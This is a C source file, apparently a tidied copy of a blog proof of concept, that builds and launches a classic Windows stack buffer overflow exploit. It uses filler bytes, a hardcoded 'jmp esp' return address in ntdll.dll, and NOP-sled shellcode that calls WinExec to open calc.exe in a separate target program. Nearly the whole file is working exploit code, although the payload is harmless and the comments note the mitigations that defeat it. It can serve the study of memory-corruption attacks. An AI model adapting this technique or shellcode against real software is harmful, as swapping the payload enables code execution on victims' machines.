#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#include <windows.h>

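/*
 * Proof-of-concept launcher: builds one command-line string made of
 * "test.exe " followed by 20 filler bytes, a 4-byte address and a short
 * payload, then starts that command with CreateProcess() and waits for it
 * to exit.  The target program ("test.exe") is not part of this file; the
 * layout assumes it copies its argument into a fixed-size stack buffer, and
 * the author's comments describe the 4-byte value as a "jmp esp" in
 * ntdll.dll.
 *
 * The absolute addresses in the payload are hardcoded for one specific
 * Windows build (the original author says to replace them as needed).
 * Stack cookies (/GS), DEP and ASLR are the mitigations that break exactly
 * this filler / return-address / sled layout.
 *
 * Fixes relative to the original: malloc() was called without <stdlib.h>
 * (implicit declaration), its result was never checked or freed, and a
 * failed CreateProcess() fell through to WaitForSingleObject() on a NULL
 * handle while still exiting with status 0.
 *
 * Returns 0 when the process was created and has exited, 1 on any failure.
 */
int main(void)
{
    STARTUPINFO si = {0};
    PROCESS_INFORMATION pi = {0};
    int rc = 1;

    si.cb = sizeof(si);

    /* Payload: a NOP sled, then "mov edi, 0x7C8615B5" (author's note: the
     * address of WinExec is hardcoded, replace if necessary), then a small
     * stub that calls it with the path appended at the end.
     * Author's note: thanks to rAsM for the tiny shellcode. */
    char shellcode[] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                        "\xBF\xB5\x15\x86\x7C"
                        "\xE8\xFF\xFF\xFF\xFF\xCC\x44\x58\x83"
                        "\xC0\x0B\x6A\x05\x50\xFF\xD7"
                        "C:\\WINDOWS\\system32\\calc.exe";

    char ret[] = "\xED\x1E\x95\x7C"; /* author's note: in ntdll.dll, on a "jmp esp" */

    char name[] = "test.exe ";

    /* 20 filler bytes; a fixed-size stack array replaces the original
     * unchecked malloc(21) that was never freed. */
    char padding[21];
    memset(padding, 'a', 20);
    padding[20] = '\0';

    /* None of the fragments contains a NUL byte, so strlen() is their true
     * length and "%s" copies each of them intact. */
    size_t alloc = strlen(name) + strlen(padding) + strlen(ret) + strlen(shellcode) + 1;
    char *exploitation = malloc(alloc);
    if (exploitation == NULL) {
        fprintf(stderr, "malloc(%lu) a echoue.\n", (unsigned long)alloc);
        return 1;
    }

    /* snprintf() always NUL-terminates; alloc was sized for the full string,
     * so truncation cannot happen, but the check keeps that assumption honest. */
    int written = snprintf(exploitation, alloc, "%s%s%s%s", name, padding, ret, shellcode);
    if (written < 0 || (size_t)written >= alloc) {
        fprintf(stderr, "Construction de la ligne de commande a echoue.\n");
        goto out_free;
    }

    printf("Exploit 1 - 0vercl0k.blogspot.com.\n\nCreation du processus..\n");
    /* The command line must be a writable buffer: CreateProcess() may modify
     * it in place, which is why it lives on the heap rather than in a literal. */
    if (!CreateProcess(NULL, exploitation, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi)) {
        /* pi holds no handles on failure, so there is nothing to wait on or close. */
        fprintf(stderr, "CreateProcess a echoue (erreur %lu).\n", (unsigned long)GetLastError());
        goto out_free;
    }
    printf("Processus cree.\n");

    WaitForSingleObject(pi.hProcess, INFINITE);
    CloseHandle(pi.hProcess);
    CloseHandle(pi.hThread);
    rc = 0;

out_free:
    free(exploitation);
    return rc;
}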